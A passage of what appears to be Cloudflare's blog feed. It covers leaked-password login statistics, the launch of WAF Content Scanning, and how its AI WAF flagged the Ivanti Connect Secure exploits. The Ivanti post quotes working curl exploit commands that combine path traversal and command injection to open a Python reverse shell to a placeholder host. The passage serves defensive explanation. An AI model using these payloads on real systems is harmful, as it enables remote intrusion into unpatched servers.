href="https://www.cloudflare.com/plans/free/">Cloudflare’s free plan</a>, which includes <a href="https://developers.cloudflare.com/waf/detections/leaked-credentials/"><u>leaked credentials detection</u></a> as a built-in feature. Leaked credentials refer to usernames and passwords exposed in known data breaches or credential dumps — for this analysis, our focus is specifically on leaked passwords. With 30 million Internet properties, <a href="https://w3techs.com/technologies/overview/proxy/all"><u>comprising some 20% of the web</u></a>, behind Cloudflare, this analysis provides significant insights. 
The data primarily reflects trends observed after the detection system was launched during <a href="https://blog.cloudflare.com/a-safer-internet-with-cloudflare/"><u>Birthday Week</u></a> in September 2024.</p>
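<p>Cloudflare's privacy-preserving credential checking protocol is more sophisticated than a plain hash lookup (see the post linked above), but the underlying k-anonymity idea, popularized by Have I Been Pwned's range API, can be sketched in a few lines of Python. This is an illustration of the concept, not Cloudflare's implementation:</p>

```python
import hashlib

def range_query_parts(password: str) -> tuple[str, str]:
    """Split a SHA-1 digest for a k-anonymity range lookup.

    Only the 5-character prefix is ever sent to the server; the server
    returns every known-leaked suffix sharing that prefix, and the
    client checks for a match locally.
    """
    digest = hashlib.sha1(password.encode()).hexdigest().upper()
    return digest[:5], digest[5:]

# Example: the (infamously common) password "password"
prefix, suffix = range_query_parts("password")
# A client would then query a range endpoint with `prefix` and search
# the returned list for `suffix` locally.
```

Because only the hash prefix leaves the client, the checking service learns neither the password nor its full hash.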
    <div>
      <h3>Nearly 41% of logins are at risk</h3>
      <a href="#nearly-41-of-logins-are-at-risk">
        
      </a>
    </div>
    <p>One of the biggest challenges in authentication is distinguishing between legitimate human users and malicious actors. To understand human behavior, we focus on successful login attempts (those returning a <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/200"><u>200 OK</u></a> status code), as this provides the clearest indication of user activity and real account risk. Our data reveals that approximately 41% of successful human authentication attempts involve leaked credentials.</p><p>Despite growing awareness about online security, a significant portion of users continue to reuse passwords across multiple accounts. And according to a <a href="https://www.forbes.com/advisor/business/software/american-password-habits/"><u>recent study by Forbes</u></a>, users will, on average, reuse their password across four different accounts. Even after major breaches, many individuals don’t change their compromised passwords, or still use variations of them across different services. For these users, it’s not a matter of “if” attackers will use their compromised passwords, it’s a matter of “when”.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/71DMUKH3ZzY1hr0bsavGj3/16eed591ce9b34fd4aead27746a85acf/image4.png" />
          </figure><p>When we expand to include bot-driven traffic in this analysis, the problem of leaked credentials becomes even more noticeable. Our data reveals that 52% of all detected authentication requests contain leaked passwords found in our database of over 15 billion records, including the <a href="https://haveibeenpwned.com/"><u>Have I Been Pwned</u></a> (HIBP) leaked password dataset.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4yKNn90DQQTS0j9MjpJ3AT/07513fa7c81f3a37a5f30db4798c9955/image1.png" />
          </figure><p>This percentage represents hundreds of millions of daily authentication requests, originating from both bots and humans. While not every attempt succeeds, the sheer volume of leaked credentials in real-world traffic illustrates how common password reuse is. Many of these leaked credentials still grant valid access, amplifying the risk of account takeovers.</p>
    <div>
      <h3>Attackers heavily use leaked password datasets</h3>
      <a href="#attackers-heavily-use-leaked-password-datasets">
        
      </a>
    </div>
    <p>Bots are the driving force behind <a href="https://www.cloudflare.com/learning/bots/what-is-credential-stuffing/"><u>credential-stuffing</u></a> attacks: the data indicates that 95% of login attempts involving leaked passwords come from bots.</p><p>Equipped with credentials stolen from breaches, bots systematically target websites at scale, testing thousands of login combinations in seconds.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7rjFwHf1vwRE43M2JuNWkI/2147f2dfaa04f06ae4e75d1ad05232d2/image5.png" />
          </figure><p>Data from the Cloudflare network exposes this trend, showing that bot-driven attacks remain alarmingly high over time. Popular platforms like WordPress, Joomla, and Drupal are frequent targets, due to their widespread use and exploitable vulnerabilities, as we will explore in the upcoming section.</p><p>Once bots successfully breach one account, attackers reuse the same credentials across other services to amplify their reach. They also employ sophisticated evasion tactics, such as spreading login attempts across different source IP addresses or mimicking human behavior to blend into legitimate traffic.</p><p>The result is a constant, automated threat vector that challenges traditional security measures and exploits the weakest link: password reuse.</p>
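<p>Site owners on Cloudflare can act on these signals directly in the WAF. As a sketch (the field name comes from the leaked credentials detection documentation linked above; verify it before use), a custom rule that issues a Managed Challenge on login attempts carrying a leaked password could match on:</p>

```
http.request.method == "POST" and cf.waf.credential_check.password_leaked
```

Pairing a rule like this with Rate Limiting makes the credential-stuffing attempts described above far less effective.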
    <div>
      <h3>Brute force attacks against WordPress</h3>
      <a href="#brute-force-attacks-against-wordpress">
        
      </a>
    </div>
    <p>Content Management Systems (CMS) are used to build websites and often rely on simple authentication and login plugins. This is convenient, but their widespread adoption also makes them frequent targets of credential stuffing attacks. WordPress, the most popular CMS, has a well-known login page format, which makes websites built on it a common target for attackers.</p><p>Across our network, WordPress accounts for a significant portion of authentication requests. This is unsurprising given its <a href="https://w3techs.com/technologies/details/cm-wordpress"><u>market share</u></a>. However, what stands out is the alarming number of successful logins using leaked passwords, especially by bots.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3fJWsdEZJ9bo5eYbH9A35w/ed6a805386ef406565be08bdff5260b9/image3.png" />
          </figure><p><b>76% of leaked password login attempts for websites built on WordPress are successful.</b> Of these, 48% of successful logins are bot-driven. This is a shocking figure that indicates nearly half of all successful logins are executed by unauthorized systems designed to exploit stolen credentials. Successful unauthorized access is often the first step in <a href="https://www.cloudflare.com/zero-trust/solutions/account-takeover-prevention/">account takeover (ATO) attacks</a>.</p><p>The remaining 52% of successful logins originate from legitimate, non-bot users. This figure, higher than the average of 41% across all platforms, highlights how pervasive password reuse is among real users, putting their accounts at significant risk.</p><p><b>Only 5% of leaked password login attempts result in access being denied.</b></p><p>This is a low number compared to the successful bot-driven login attempts, and could be tied to a lack of security measures like <a href="https://www.cloudflare.com/learning/bots/what-is-rate-limiting/"><u>rate-limiting</u></a> or <a href="https://www.cloudflare.com/learning/access-management/what-is-multi-factor-authentication/"><u>multi-factor authentication (MFA)</u></a>. If such measures were in place, we would expect the share of denied attempts to be higher. Notably, 90% of these denied requests are bot-driven, reinforcing the idea that while some security measures are blocking automated logins, many still slip through.</p><p>The overwhelming presence of bot traffic in this category points to ongoing automated attempts to brute-force access.</p><p>The <b>remaining 19%</b> of login attempts fall under other outcomes, such as timeouts, incomplete logins, or users who changed their passwords, so they neither count as direct “successes” nor do they register as “denials”.</p>
    <div>
      <h3>Keeping user accounts safe with Cloudflare</h3>
      <a href="#keeping-user-accounts-safe-with-cloudflare">
        
      </a>
    </div>
    <p>If you're a user, start by changing reused or weak passwords and use unique, strong ones for each website or application. Enable <u>multi-factor authentication (MFA)</u> on all of your accounts that support it, and start exploring passkeys as a more secure, phishing-resistant alternative to traditional passwords.</p><p>For website owners, activate <a href="https://developers.cloudflare.com/waf/detections/leaked-credentials/"><u>leaked credentials detection</u></a> to monitor and address these threats in real time and issue password reset flows on leaked credential matches.</p><p>Additionally, enable features like <a href="https://www.cloudflare.com/application-services/products/rate-limiting/"><u>Rate Limiting</u></a> and <a href="https://www.cloudflare.com/application-services/products/bot-management/"><u>Bot Management</u></a> tools to minimize the impact of automated attacks. Audit password reuse patterns, identify leaked credentials within your systems, and enforce robust password hygiene policies to strengthen overall security.</p><p>By adopting these measures, both individuals and organizations can stay ahead of attackers and build stronger defenses.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Authentication]]></category>
            <category><![CDATA[Account Takeover]]></category>
            <category><![CDATA[Password-reuse]]></category>
            <category><![CDATA[Statistics]]></category>
            <category><![CDATA[Bots]]></category>
            <guid isPermaLink="false">NeRK5xA5mn6uOY47obLsr</guid>
            <dc:creator>Radwa Radwan</dc:creator>
            <dc:creator>Sabina Zejnilovic</dc:creator>
        </item>
        <item>
            <title><![CDATA[General availability for WAF Content Scanning for file malware protection]]></title>
            <link>https://blog.cloudflare.com/waf-content-scanning-for-malware-detection/</link>
            <pubDate>Thu, 07 Mar 2024 14:00:14 GMT</pubDate>
            <description><![CDATA[ Announcing the General Availability of WAF Content Scanning, protecting your web applications and APIs from malware by scanning files in-transit ]]></description>
            <content:encoded><![CDATA[ 
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6Kt17OxA0rO7EXenzZGJXf/b2410be6e9de67c10ee488c6c23ac60d/TXqgLUZ0L11n0fBPaEzi9DYuGJ_QGmAxLbfS9xKb6c_N9nBhFQhsQ4TsJ7kU82ADmgLjkM6EWmZXDBO_5OX4urYAeca428kjsFf2MM8RWBUsNtkg0gEO75D-brm4.png" />
            
            </figure><p>File upload is a common feature in many web applications. Applications may allow users to upload files like images of flood damage to file an insurance claim, PDFs like resumes or cover letters to apply for a job, or other documents like receipts or income statements. However, beneath the convenience lies a potential threat, since allowing unrestricted file uploads can expose the web server and your enterprise network to significant risks related to <a href="https://www.cloudflare.com/network-services/solutions/enterprise-network-security/">security</a>, privacy, and compliance.</p><p>Cloudflare recently introduced <a href="/waf-content-scanning/">WAF Content Scanning</a>, our in-line <a href="https://www.cloudflare.com/application-services/solutions/">malware file detection and prevention solution</a> to stop malicious files from reaching the web server, offering our Enterprise WAF customers an additional line of defense against security threats.</p><p>Today, we're pleased to announce that the feature is now generally available. It will be automatically rolled out to existing WAF Content Scanning customers before the end of March 2024.</p><p>In this blog post we will share more details about the new version of the feature, what we have improved, and reveal some of the technical challenges we faced while building it. This feature is available to Enterprise WAF customers as an add-on license, contact your account team to get it.</p>
    <div>
      <h2>What to expect from the new version?</h2>
      <a href="#what-to-expect-from-the-new-version">
        
      </a>
    </div>
    <p>The feedback from the early access version has resulted in additional improvements. The main one is expanding the maximum size of scanned files from 1 MB to 15 MB. This change required a complete redesign of the solution's architecture and implementation. Additionally, we are improving the dashboard visibility and the overall analytics experience.</p><p>Let's quickly review how malware scanning operates within our WAF.</p>
    <div>
      <h2>Behind the scenes</h2>
      <a href="#behind-the-scenes">
        
      </a>
    </div>
    <p>WAF Content Scanning operates in a few stages: users activate and configure it, then the scanning engine detects which requests contain files, the files are sent to the scanner returning the scan result fields, and finally users can build custom rules with these fields. We will dig deeper into each step in this section.</p>
    <div>
      <h3>Activate and configure</h3>
      <a href="#activate-and-configure">
        
      </a>
    </div>
    <p>Customers can enable the feature via the <a href="https://developers.cloudflare.com/waf/about/content-scanning/api-calls/#enable-waf-content-scanning">API</a>, or through the Settings page in the dashboard (Security → Settings), where a new section has been added for <a href="https://developers.cloudflare.com/waf/about/#detection-versus-mitigation">incoming traffic detection</a> configuration and enablement. As soon as the feature is enabled, the setting is distributed across the Cloudflare network and scanning of incoming traffic begins.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/33blcVizOJx9iZiSqAzX3Y/5bdd6e83500ebf66d842a92854515b4e/image1-27.png" />
            
            </figure><p>Customers can also add a <a href="https://developers.cloudflare.com/waf/about/content-scanning/#2-optional-configure-a-custom-scan-expression">custom configuration</a> depending on the file upload method, such as a base64 encoded file in a JSON string, which allows the specified file to be parsed and scanned automatically.</p><p>In the example below, the customer wants us to look at JSON bodies for the key “file” and scan them.</p><p>This rule is written using the <a href="https://developers.cloudflare.com/ruleset-engine/rules-language/">wirefilter syntax</a>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2bZfebbWfiQfchZpKJv75q/6088e2458deff944c3965647be3249ef/Scanning-all-incoming-requests-for-file-malware.png" />
            
            </figure>
    <div>
      <h3>Engine runs on traffic and scans the content</h3>
      <a href="#engine-runs-on-traffic-and-scans-the-content">
        
      </a>
    </div>
    <p>As soon as the feature is activated and configured, the scanning engine runs the pre-scanning logic, and identifies content automatically via heuristics. In this case, the engine logic does not rely on the <i>Content-Type</i> header, as it’s easy for attackers to manipulate. When relevant content or a file has been found, the engine connects to the <a href="https://developers.cloudflare.com/cloudflare-one/policies/gateway/http-policies/antivirus-scanning/">antivirus (AV) scanner</a> in our <a href="https://www.cloudflare.com/zero-trust/solutions/">Zero Trust solution</a> to perform a thorough analysis and return the results of the scan. The engine uses the scan results to propagate useful fields that customers can use.</p>
    <div>
      <h3>Integrate with WAF</h3>
      <a href="#integrate-with-waf">
        
      </a>
    </div>
    <p>For every request where a file is found, the scanning engine returns various <a href="https://developers.cloudflare.com/waf/about/content-scanning/#content-scanning-fields">fields</a>, including:</p>
            <pre><code>cf.waf.content_scan.has_malicious_obj,
cf.waf.content_scan.obj_sizes,
cf.waf.content_scan.obj_types, 
cf.waf.content_scan.obj_results</code></pre>
            <p>The scanning engine integrates with the WAF where customers can use those fields to <a href="https://developers.cloudflare.com/waf/custom-rules/">create custom WAF rules</a> to address various use cases. The basic use case is primarily blocking malicious files from reaching the web server. However, customers can construct more complex logic, such as enforcing constraints on parameters such as file sizes, file types, endpoints, or specific paths.</p>
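<p>As an illustrative sketch using the fields listed above (the 10 MB threshold is arbitrary, chosen only for the example), a custom rule blocking malicious or oversized uploads could match on:</p>

```
cf.waf.content_scan.has_malicious_obj or any(cf.waf.content_scan.obj_sizes[*] > 10485760)
```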
    <div>
      <h2>In-line scanning limitations and file types</h2>
      <a href="#in-line-scanning-limitations-and-file-types">
        
      </a>
    </div>
    <p>One question that often comes up is about the file types we detect and scan in WAF Content Scanning. Initially, addressing this query posed a challenge since HTTP requests do not have a definition of a “file”, and scanning all incoming HTTP requests does not make sense as it adds extra processing and latency. So, we had to decide on a definition to spot HTTP requests that include files, or as we call it, “uploaded content”.</p><p>The WAF Content Scanning engine makes that decision by filtering out certain content types identified by heuristics. Any content types not included in a predefined list, such as <code>text/html</code>, <code>text/x-shellscript</code>, <code>application/json</code>, and <code>text/xml</code>, are considered uploaded content and are sent to the scanner for examination. This allows us to scan a <a href="https://crates.io/crates/infer#supported-types">wide range</a> of content types and file types without affecting the performance of all requests by adding extra processing. The wide range of files we scan includes:</p><ul><li><p>Executable (e.g., <code>.exe</code>, <code>.dll</code>, <code>.wasm</code>)</p></li><li><p>Documents (e.g., <code>.doc</code>, <code>.docx</code>, <code>.pdf</code>, <code>.ppt</code>, <code>.xls</code>)</p></li><li><p>Compressed (e.g., <code>.7z</code>, <code>.gz</code>, <code>.zip</code>, <code>.rar</code>)</p></li><li><p>Image (e.g., <code>.jpg</code>, <code>.png</code>, <code>.gif</code>, <code>.webp</code>, <code>.tif</code>)</p></li><li><p>Video and audio files within the 15 MB file size range.</p></li></ul><p>The 15 MB file size limit stems from the fact that in-line file scanning runs in real time: this protects the web server and gives instant access to clean files, but it sits directly in the request delivery path. Therefore, it’s crucial to scan the payload without causing significant delays or interruptions, namely increased CPU time and latency.</p>
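<p>Cloudflare's exact heuristics are not public, but the general idea of identifying uploaded content from its leading "magic bytes" rather than its easily spoofed Content-Type header, as done by libraries like the infer crate linked above, can be sketched in Python. The signature table below is a small illustrative subset:</p>

```python
# Minimal magic-byte sniffer. Illustrative only: production code should
# use a maintained detection library rather than a hand-rolled table.
SIGNATURES = [
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"GIF8", "gif"),
    (b"%PDF", "pdf"),
    (b"PK\x03\x04", "zip"),  # also .docx, .xlsx, and other OOXML files
    (b"MZ", "exe"),          # Windows PE executables
    (b"\x1f\x8b", "gz"),
]

def sniff(payload: bytes) -> str:
    """Best-guess file type from leading bytes, ignoring Content-Type."""
    for magic, kind in SIGNATURES:
        if payload.startswith(magic):
            return kind
    return "unknown"
```

A request body that matches none of the known "safe" content types can then be routed to the scanner based on what the bytes actually are.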
    <div>
      <h2>Scaling the scanning process to 15 MB</h2>
      <a href="#scaling-the-scanning-process-to-15-mb">
        
      </a>
    </div>
    <p>In the early design of the product, we built a system that could handle requests with a maximum body size of 1 MB, and increasing the limit to 15 MB had to happen without adding any extra latency. As mentioned, this latency is not added to all requests, but only to the requests that have uploaded content. However, increasing the size with the same design would have increased the latency by 15x for those requests.</p><p>In this section, we use scanning files embedded in JSON request bodies as an example: we first discuss how the former architecture handled it and why expanding the file size limit with that design was challenging, then we compare it in detail with the changes made in the new release to overcome the extra latency.</p>
    <div>
      <h3>Old architecture used for the Early Access release</h3>
      <a href="#old-architecture-used-for-the-early-access-release">
        
      </a>
    </div>
    <p>In order for customers to use the content scanning functionality in scanning files embedded in JSON request bodies, they had to configure a rule like:</p>
            <pre><code>lookup_json_string(http.request.body.raw, “file”)</code></pre>
            <p>This means we should look in the request body but only for the “file” key, which in the image below contains a base64 encoded string for an image.</p><p>When the request hits our Front Line (FL) NGINX proxy, we buffer the request body. This will be in an in-memory buffer, or written to a temporary file if the size of the request body exceeds the NGINX configuration of <a href="https://nginx.org/en/docs/http/ngx_http_core_module.html#client_body_buffer_size">client_body_buffer_size</a>. Then, our WAF engine executes the lookup_json_string function and returns the base64 string, which is the content of the file key. The base64 string gets sent via Unix Domain Sockets to our malware scanner, which does MIME type detection and returns a verdict to the file upload scanning module.</p><p>This architecture had a bottleneck that made it hard to expand on: its latency cost. The request body is first buffered in NGINX and then copied into our WAF engine, where rules are executed. The malware scanner will then receive the execution result — which, in the worst scenario, is the entire request body — over a Unix domain socket. This means that once NGINX buffers the request body, we send and buffer it in two more services.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2OZumKn4Bar00t8BxfPuz6/bf2ffb663817b3092dccc2acd2701374/Screenshot-2024-03-07-at-12.31.52.png" />
            
            </figure>
    <div>
      <h3>New architecture for the General Availability release</h3>
      <a href="#new-architecture-for-the-general-availability-release">
        
      </a>
    </div>
    <p>In the new design, the requirements were to scan larger files (15x larger) while not compromising on performance. To achieve this, we decided to bypass our WAF engine, which is where we introduced the most latency.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3e2jggqBgIMdZaAwQPkiq9/01f31f022d7ef735cdb536041a28f25b/Screenshot-2024-03-07-at-12.32.42.png" />
            
            </figure><p>In the new architecture, we made the malware scanner aware of what is needed to execute the rule, hence bypassing the Ruleset Engine (RE). For example, the configuration <code>lookup_json_string(http.request.body.raw, "file")</code> will be represented roughly as:</p>
            <pre><code>{
   Function: lookup_json_string
   Args: [“file”]
}</code></pre>
            <p>This is achieved by walking the <a href="https://en.wikipedia.org/wiki/Abstract_syntax_tree">Abstract Syntax Tree</a> (AST) when the rule is configured, and deploying the sample struct above to our global network. The struct’s values will be read by the malware scanner, and rule execution and malware detection will happen within the same service. This means we don’t need to read the request body, execute the rule in the Ruleset Engine (RE) module, and then send the results over to the malware scanner.</p><p>The malware scanner will now read the request body from the temporary file directly, perform the rule execution, and return the verdict to the file upload scanning module.</p><p>The file upload scanning module populates these <a href="https://developers.cloudflare.com/waf/about/content-scanning/#content-scanning-fields">fields</a>, so they can be used to write custom rules and take actions. For example:</p>
            <pre><code>all(cf.waf.content_scan.obj_results[*] == "clean")</code></pre>
            <p>This module also enriches our logging pipelines with these fields, which can then be read in <a href="https://developers.cloudflare.com/logs/about/">Log Push</a>, <a href="https://developers.cloudflare.com/logs/edge-log-delivery/">Edge Log Delivery</a>, Security Analytics, and Firewall Events in the dashboard. For example, this is the security log in the Cloudflare dashboard (Security → Analytics) for a web request that triggered WAF Content Scanning:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2XGS4YhMjcm2rLRg9znwVr/9f1e5dcd67808f3bba13b80296a1aa42/image5-15.png" />
            
            </figure>
    <div>
      <h2>WAF content scanning detection visibility</h2>
      <a href="#waf-content-scanning-detection-visibility">
        
      </a>
    </div>
    <p>Using the concept of incoming traffic detection, WAF Content Scanning enables users to identify hidden risks through their traffic signals in the analytics before blocking or mitigating matching requests. This reduces false positives and allows security teams to make decisions based on well-informed data. This isn't the only place we apply this idea: we do the same for a number of other products, like WAF Attack Score and Bot Management.</p><p>We have integrated this information into our security products, like Security Analytics, to provide data visibility. The <b>Content Scanning</b> tab, located on the right sidebar, displays traffic patterns even if no WAF rules are in place. The same data is also reflected in the sampled requests, and you can create new rules from the same view.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6M1QR4dFLFsv0sG8xQ7ezj/83ec1b533b3b2c490451d6624685a26b/image7-4.png" />
            
            </figure><p>On the other hand, if you want to fine-tune your security settings, you will get better visibility in Security Events, which shows the requests that matched the specific rules you have created in the WAF.</p><p>Last but not least, in our <a href="https://developers.cloudflare.com/logs/reference/log-fields/zone/http_requests/">Logpush</a> datastream, we have included the scan fields, which can be selected and sent to any external log handler.</p>
    <div>
      <h2>What’s next?</h2>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>Before the end of March 2024, all current and new customers who have enabled WAF Content Scanning will be able to scan uploaded files up to 15 MB. Next, we'll focus on improving how we handle files in the rules, including adding a dynamic header functionality. Quarantining files is also another important feature we will be adding in the future. If you're an Enterprise customer, reach out to your account team for more information and to get access.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[WAF Rules]]></category>
            <category><![CDATA[Content Scanning]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[General Availability]]></category>
            <category><![CDATA[Anti Malware]]></category>
            <guid isPermaLink="false">018GZnJIhpYLWge6uKNfnd</guid>
            <dc:creator>Radwa Radwan</dc:creator>
            <dc:creator>Paschal Obba</dc:creator>
            <dc:creator>Shreya Shetty</dc:creator>
        </item>
        <item>
            <title><![CDATA[How Cloudflare’s AI WAF proactively detected the Ivanti Connect Secure critical zero-day vulnerability]]></title>
            <link>https://blog.cloudflare.com/how-cloudflares-ai-waf-proactively-detected-ivanti-connect-secure-critical-zero-day-vulnerability/</link>
            <pubDate>Tue, 23 Jan 2024 14:00:48 GMT</pubDate>
            <description><![CDATA[ The issuance of Emergency Rules by Cloudflare on January 17, 2024, helped give customers a big advantage in dealing with these threats ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3RS6SAVZIQdSxkFz8zjeDM/77bd1b148c86f29e3d9d96e300bdf415/image1-2.png" />
            
            </figure><p>Most WAF providers rely on reactive methods, responding to vulnerabilities after they have been discovered and exploited. However, we believe in proactively addressing potential risks, using AI to achieve this. Today we are sharing a recent example of two critical vulnerabilities (CVE-2023-46805 and CVE-2024-21887) and how Cloudflare's AI-powered Attack Score and Emergency Rules in the WAF have countered this threat.</p>
    <div>
      <h3>The threat: CVE-2023-46805 and CVE-2024-21887</h3>
      <a href="#the-threat-cve-2023-46805-and-cve-2024-21887">
        
      </a>
    </div>
    <p>An authentication bypass (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-46805">CVE-2023-46805</a>) and a command injection vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2024-21887">CVE-2024-21887</a>) impacting Ivanti products were recently disclosed and analyzed by <a href="https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis">AttackerKB</a>. These vulnerabilities pose significant risks that could lead to unauthorized access and control over affected systems. In the following section we discuss how they can be exploited.</p>
    <div>
      <h3>Technical analysis</h3>
      <a href="#technical-analysis">
        
      </a>
    </div>
    <p>As discussed in <a href="https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis">AttackerKB</a>, the attacker can send a specially crafted request to the target system using a command like this:</p>
            <pre><code>curl -ik --path-as-is https://VICTIM/api/v1/totp/user-backup-code/../../license/keys-status/%3Bpython%20%2Dc%20%27import%20socket%2Csubprocess%3Bs%3Dsocket%2Esocket%28socket%2EAF%5FINET%2Csocket%2ESOCK%5FSTREAM%29%3Bs%2Econnect%28%28%22CONNECTBACKIP%22%2CCONNECTBACKPORT%29%29%3Bsubprocess%2Ecall%28%5B%22%2Fbin%2Fsh%22%2C%22%2Di%22%5D%2Cstdin%3Ds%2Efileno%28%29%2Cstdout%3Ds%2Efileno%28%29%2Cstderr%3Ds%2Efileno%28%29%29%27%3B</code></pre>
            <p>This command targets an endpoint (<b>/license/keys-status/</b>) that is usually protected by authentication. However, the attacker can bypass the authentication by manipulating the URL to include <b>/api/v1/totp/user-backup-code/../../license/keys-status/</b>. This technique is known as <a href="https://owasp.org/www-community/attacks/Path_Traversal">directory traversal</a>.</p><p>The URL-encoded part of the command decodes to a Python reverse shell, which looks like this:</p>
            <pre><code>;python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("CONNECTBACKIP",CONNECTBACKPORT));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())';</code></pre>
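<p>You can check the decoding with Python's standard library. The snippet below (an illustration only) decodes the first few percent-encoded bytes of the path segment from the curl command above:</p>

```python
from urllib.parse import unquote

# Opening bytes of the percent-encoded payload from the curl command above.
encoded_prefix = "%3Bpython%20%2Dc%20%27import%20socket%2Csubprocess%3B"

decoded = unquote(encoded_prefix)
print(decoded)  # ;python -c 'import socket,subprocess;
```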
            <p>The Python reverse shell gives the attacker interactive control over the target system.</p><p>The command injection itself lies in how the system processes the <b>node_name</b> parameter of the endpoint <b>/api/v1/license/keys-status/path:node_name</b>. If an attacker can control the value of <b>node_name</b>, they can inject commands into the system.</p><p>The attacker sends a GET request to the URI path <b>/api/v1/totp/user-backup-code/../../license/keys-status/;CMD;</b>, where CMD is any command they wish to execute; the semicolons delimit the injected command. To ensure the command is correctly processed by the system, it must be URL-encoded.</p><p>AttackerKB's post details a second command injection, this one authenticated and located in a different part of the system. The same Python reverse shell payload used in the first command injection can be employed here, wrapped in a JSON structure to trigger the vulnerability. Since the payload travels in a JSON body, it doesn't need to be URL-encoded:</p>
            <pre><code>{
    "type": ";python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"CONNECTBACKIP\",CONNECTBACKPORT));subprocess.call([\"/bin/sh\",\"-i\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())';",
    "txtGCPProject": "a",
    "txtGCPSecret": "a",
    "txtGCPPath": "a",
    "txtGCPBucket": "a"
}</code></pre>
            <p>Although the <b>/api/v1/system/maintenance/archiving/cloud-server-test-connection</b> endpoint requires authentication, an attacker can bypass this by chaining it with the previously mentioned directory traversal vulnerability. They can construct an unauthenticated URI path <b>/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection</b> to reach this endpoint and exploit the vulnerability.</p><p>To execute an unauthenticated operating system command, an attacker would use a curl request like this:</p>
            <pre><code>curl -ik --path-as-is https://VICTIM/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection -H 'Content-Type: application/json' --data-binary $'{ \"type\": \";python -c \'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"CONNECTBACKIP\\\",CONNECTBACKPORT));subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())\';\", \"txtGCPProject\":\"a\", \"txtGCPSecret\":\"a\", \"txtGCPPath\":\"a\", \"txtGCPBucket\":\"a\" }'</code></pre>
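<p>Both unauthenticated requests hinge on the same directory traversal. A quick sketch with Python's <code>posixpath</code> shows why the crafted path resolves to the protected endpoint (this is an illustration of path normalization, not the appliance's actual routing code):</p>

```python
import posixpath

# The crafted request path from the first exploit command.
crafted = "/api/v1/totp/user-backup-code/../../license/keys-status/"

# Normalization collapses the "../" segments: the request enters through an
# unauthenticated route prefix but resolves to the authenticated endpoint.
resolved = posixpath.normpath(crafted)
print(resolved)  # /api/v1/license/keys-status
```

<p>Note that the exploit's <code>--path-as-is</code> flag tells curl not to collapse the dot segments client-side, so the traversal reaches the server intact.</p>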
            
    <div>
      <h3>Cloudflare's proactive defense</h3>
      <a href="#cloudflares-proactive-defense">
        
      </a>
    </div>
    <p>Cloudflare WAF is supported by an additional AI-powered layer called <a href="/stop-attacks-before-they-are-known-making-the-cloudflare-waf-smarter/">WAF Attack Score</a>, built to catch attack bypasses before they are even announced. Attack Score indicates whether a request is malicious, focusing so far on three main categories: XSS, SQLi, and some RCE variations (command injection, Apache Log4j, etc.). The score ranges from 1 to 99, and the lower the score, the more malicious the request. Generally speaking, any request with a score below 20 is considered malicious.</p><p>Let’s look at the results of the exploitation example above for CVE-2023-46805 and CVE-2024-21887 in Cloudflare’s dashboard (Security &gt; Events). Attack Score analysis produces three individual scores, each labeled to indicate its relevance to a specific attack category. There's also a global score, "WAF Attack Score", which considers the combined impact of the three. When an attack matches one category, that sub-score tends to drive the global score; here the dominant sub-score is Remote Code Execution (“WAF RCE Attack Score”).</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/qkPQsiNBaL4HSooddJ7Mv/8e308dc48932a8ea859414bd664bbab3/image2-2.png" />
            
            </figure><p>Similarly, for the unauthenticated operating system command request, the AI model returned “WAF Attack Score: 19”, which also falls in the malicious category. It’s worth mentioning that these example scores are not fixed numbers and may vary with the incoming attack variation.</p><p>The great news: customers on Enterprise and Business plans with WAF Attack Score enabled, along with a rule to block low scores (e.g. <code><a href="https://developers.cloudflare.com/waf/about/waf-attack-score/#available-scores">cf.waf.score</a> le 20</code>, or <code><a href="https://developers.cloudflare.com/ruleset-engine/rules-language/fields/#field-cf-waf-score-class">cf.waf.score.class</a> eq "attack"</code> for Business), were already shielded from every exploit variant we tested, even before the vulnerability was announced.</p>
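<p>As a rough mental model, the global score maps to the <code>cf.waf.score.class</code> bands. The thresholds in this sketch reflect Cloudflare's documented ranges at the time of writing and should be treated as an assumption:</p>

```python
def waf_score_class(score: int) -> str:
    """Map a WAF Attack Score (1-99) to its class label.

    Band boundaries are an assumption based on Cloudflare's documented
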